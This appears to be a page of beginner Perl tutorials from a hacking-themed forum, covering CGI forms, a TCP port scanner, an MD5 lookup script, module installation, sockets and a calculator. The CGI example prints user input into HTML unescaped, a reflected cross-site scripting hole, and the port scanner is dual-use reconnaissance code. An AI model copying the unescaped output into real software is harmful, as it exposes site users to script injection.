<h1>HTML test page for iExploit perl-cgi example</h1>
<hr />
<p><form method=\"GET\" action=\"cgi-bin/example.cgi\">
Input text to display: <input type=\"text\" size=\"30\" maxlength=\"100\" name=\"input\"> <br />
<input type=\"submit\" name=\"submit\" value=\"Print value!\">
</form></p>
<hr />
</body>
</html>

CGI script - example.cgi (placed in cgi-bin/ or where-ever you have cgi configured to run)

#!C:/Perl64/bin/Perl.exe -w
# Semtex-Primed
# Perl-CGI example2
# GET method using HTML form

    local ($buffer, @pairs, $pair, $name, $value, %FORM);
    $ENV{'REQUEST_METHOD'} =~ tr/a-z/A-Z/;
    if ($ENV{'REQUEST_METHOD'} eq \"GET\")
    {
	$buffer = $ENV{'QUERY_STRING'};
    }
    @pairs = split(/&/, $buffer);
    foreach $pair (@pairs)
    {
	($name, $value) = split(/=/, $pair);
	$value =~ tr/+/ /;
	$value =~ s/%(..)/pack(\"C\", hex($1))/eg;
	$FORM{$name} = $value;
    }
    $input = $FORM{input};

print \"Content-type:text/html\r\n\r\n\";
print \"<html>\";
print \"<head>\";
print \"<title>..::iExploit Rules::..</title>\";
print \"</head>\";
print \"<body>\";
print \"<h1>HTML test page for iExploit perl-cgi example</h1>\";
print \"<hr />\";
print \"<h2>The value you input is: $input</h2>\";
print \"<hr />\";
print \"Thanks, Semtex-Primed\";
print \"</body>\";
print \"</html>\";

So let me walk you through whats going on here. In the HTML page your being asked to enter a value/word or whatever you want. The page then using the GET method sends the value to the perl-cgi script (notice action="cgi-bin/example.cgi"). But anyway this isn't a HTML forms tutorial so you should know that already.

Moving on to the cgi script, the script reads the values and splits the name of the incoming info and the value for the named input. We then put the value we want into a variable within the script. This is done here> "$input = $FORM{input};" 'input' on the html form is the name of that particular input being sent. So that corresponding value is read and saved to the variable $input.

Next we create a webpage using perl/cgi to output the data you input on index.html.

This script also demonstrates writing the html code line-by-line instead of using the block style in the last script.

Hope you've learned something more about the capabilities of perl-cgi and thanks. Again for cgi to work on your web-server you will need to enable it. I'll be writing a tutorial on how to enable/config it within apache2 soon.

Simple Port Scanner

Sh3llc0d3 — Sun, 20 Mar 2011 01:28:55 -0400

Nice and simple, probably one of the first perl programs I made using sockets.

#!/usr/bin/perl
# Perl Port Scanner
# Semtex-Primed
use IO::Socket;

if(@ARGV != 3){
	print \"Semtex-Primed\n\";
	print \"Learn how to use this!!!\n\";
	print \"$0 [start port] [end port] [host]\n\";
        print \"Example: $0 1 65535 127.0.0.1\n\";
	exit 1;
}
if($ARGV[0] > $ARGV[1]){
	print \"The Start port is higher then End port: Sort it out!\n\";
	exit 1;
}
for($i = $ARGV[0]; $i <= $ARGV[1]; ++$i){
	$host = new IO::Socket::INET(
		PeerAddr => $ARGV[2],
		PeerPort => $i,
		Proto => 'tcp',
		Timeout => 1
	);
	if($host){
		print \"Port $i is OPEN\n\";
	} else {
		print \"Port $i is CLOSED\n\";
	}
}
exit;

Perl-CGI Example-01

Sh3llc0d3 — Fri, 18 Mar 2011 00:22:40 -0400

Well I got the examples idea from chronic and thought i'd add some variety into the perl section. CGI is server side scripting, you can create CGI scripts in several languages, python being another example but perl being the focus of this example.

#!C:/Perl64/bin/Perl.exe -w
# CGI Example1
use CGI;

print \"Content-Type: text/html\n\n\";

print <<\"EOF\";
<HTML>
<HEAD>
<TITLE>Hello, world!</TITLE>
</HEAD>

<BODY>
<h1>Hello, world!</h1>
<hr>
<p>This is a crappy example for you guys :P</p>
<hr>
</BODY>
</HTML>
EOF

As you can see, this script looks pretty much in the broad aspect like a normal perl script. Notice the "use CGI;". CGI can be scripted a few ways, another being to 'print' every single line of HTML or like this example script a block of HTML code and then print it. This is the easiest :P

For Perl-CGI what do you need to know? HTML, and to a degree a fair amount of perl. You can create a simple HTML page, however for complex pages which involve forms, variable handling, POST/GET you'll need to know perl if you want it all integrated into one script. You could use a seperate script however that'd be pretty much pointless.

If you want to try this example out, fiddle about with it and have a go. Make sure you change "#!C:/Perl64/bin/Perl.exe" to where ever your perl is, usually in *nix "/usr/bin/perl" or "C:/Perl/bin/Perl.exe" for windows x86/32bit

MD5 hash finder

Sh3llc0d3 — Sun, 16 Jan 2011 04:30:27 -0500

Here's a script I was messing about with to learn perl. Read my comments if you want to run it. It doesn't crack hashes you enter a word and it searches for the hash.

#!/usr/bin/perl
# Pointless MD5 finder I made when learning.
# Just enter a word and it'll search for your hash on rednoize.com.
# You need to install Digest::MD5 from cpan.org
# Semtex-Primed - iExploit.org
use LWP::UserAgent;
use Digest::MD5 qw(md5_hex);
$browser = LWP::UserAgent->new;
while(1){
	print \"Enter word to search for:\n\";
	$hash = <STDIN>;
	chomp($hash);
	$seek = \"http://md5.rednoize.com/?=$hash&b=MD5-Search\";
	$browser->get($seek) or die \"Failed to send request!\n\";
	print \"$hash\" . \":\" . md5_hex(\"$hash\") . \" found\" . \"\n\";
}

Installing Perl Modules [Linux]

Sh3llc0d3 — Sun, 02 Jan 2011 04:38:26 -0500

Ok, well as in other languages you need header files or modules to use specific features such as the cmath header in C++ to use certain maths functions you need to do the same in Perl. These neccessary files are known as modules, perl modules or .pm files.

For instance we will take the libnet as an example:

we go to http://search.cpan.org/ and search for "libnet" this should bring up several results but we want the bundle (which should be the first result). Here's the link eitherway. Now we've found the module page you'll see on the right hand side the download link... download it and note where you save it.

Find the downloaded file/module using a shell and run the following to decompress the tarred file:

gzip -dc file.tar.gz | tar -xof -

Then to unpack the resulting file use:

tar -xof file.tar

The above will give you an extracted directory. Enter this directory using "cd directory/". Then type:

perl Makefile.PL

make

make test

You don't really need to be root for the previous commands however you now need to switch to root if you haven't already using either "sudo su" then enter your password or:

sudo make install

Then enter your password when requested.

That ladies and gents is your perl module installed. To include the perl module just add this to the start of your script:

use Net::Libnet

This guide was made with the knowledge I picked up from CPAN.org so the guides may be similar.
S-P

Simple Client/Server Socket

Sh3llc0d3 — Wed, 22 Dec 2010 21:52:55 -0500

Just been pissing about/experimenting with perl sockets... here's a little program i've made that connects to a local server and you can send messages back to the server.

Client

#!/usr/bin/perl
use IO::Socket;
my $sock = new IO::Socket::INET (
				PeerAddr => 'netbook1-linux',
				PeerPort => '8880',
				Proto => 'tcp',
				);
die \"Could not create socket: $!\n\" unless $sock;
print $sock \"Connected!!\n\";
while ($sock) {
	print \"Connected, here's your choices\n\";
	print \"1. Say Hello\n\";
	print \"2. quit\n\";
	print \">> \";
	$choice = <STDIN>;
	chomp ($choice);
	if ($choice eq \"1\") {
		print \"What is your msg?\n\";
		print \">> \";
		$msg = <STDIN>;
		chomp($msg);
		print $sock (\"$msg \n\");
		system(\"clear\");
	} elsif ($choice eq \"2\") {
		close($sock);
		exit
	}
}

Server:

#!/usr/bin/perl
use IO::Socket;
my $sock =  new IO::Socket::INET (
				LocalHost => 'Netbook1-Linux',
				LocalPort => '8880',
				Proto => 'tcp',
				Listen => 1,
				Reuse => 1,
				);
die \"Could not create socket: $!\n\" unless $sock;
my $new_sock = $sock->accept();
while (<$new_sock>) {
	print $_;
}
close($sock);

Going to mess about with this a bit more and then report back on how far I get. Going to hopefully take this a lot further as i'm trying to avoid an assignment. But hopefully this might help anyone who wants to learn perl sockets.

Maths Machine Perl Ed [Basic!]

Sh3llc0d3 — Thu, 09 Dec 2010 02:38:35 -0500

Well I was insanely bored and was pissing about with Perl and thought i'd do a Perl version of the Math's Machine I did in C++. I've not done much Perl coding and it's probably highly offensive coding to a pro perl coder but hey :P... hope you learn something... I did! (I have way too much spare time today)

#!/usr/bin/perl
@header = (
	\"	[+]----------------------------[+]\n\",
	\"	[+]                            [+]\n\",
	\"	[+]        Semtex-Primed       [+]\n\",
	\"	[+]    Maths Machine (Perl)    [+]\n\",
	\"	[+]            V0.1a           [+]\n\",
	\"	[+]                            [+]\n\",
	\"	[+]----------------------------[+]\n\"
);
@menu = (
        \"	[+]                            [+]\n\",
        \"	[+]   1. Basic Maths           [+]\n\",
        \"	[+]   2. Pythagoras            [+]\n\",
        \"	[+]   3. Area                  [+]\n\",
        \"	[+]                            [+]\n\",
	\"	[+]----------------------------[+]\n\"
);
$menuchoice = \"true\";
while ($menuchoice eq \"true\") {
system \"clear\";
system \"cls\";
print @header;
print @menu;
print \">>Choose an option \";
	$choice = <STDIN>;
	chomp ($choice);
	if ($choice eq \"1\") {
		system \"clear\";
		system \"cls\";
		print @header;
		print \"              *** Welcome to Basic Maths ***\n\";
		print \">>Enter your first number \";
		$num1 = <STDIN>;
		chomp ($num1);
		print \">>Enter your operator \";
		$op = <STDIN>;
		chomp ($op);
		print \">>Enter your second number \";
		$num2 = <STDIN>;
		chomp ($num2);
		if ($op eq \"+\") {
			$answer = $num1 + $num2;
			print \"The answer to $num1 added to $num2 equals $answer\n\";
		}
		elsif ($op eq \"-\") {
			$answer = $num1 - $num2;
			print \"The answer to $num1 subtract $num2 equals $answer\n\";
		}
		elsif ($op eq \"/\") {
			$answer = $num1 / $num2;
			print \"The answer to $num1 divided by $num2 equals $answer\n\";
		}
		elsif ($op eq \"*\") {
			$answer = $num1 * $num2;
			print \"The answer to $num1 multiplied by $num2 is $answer\n\";
		} else {
			print \"Error - try again\n\";
		};
	};
};

Nowhere near finished by the way... only have the basic maths function working.
S-P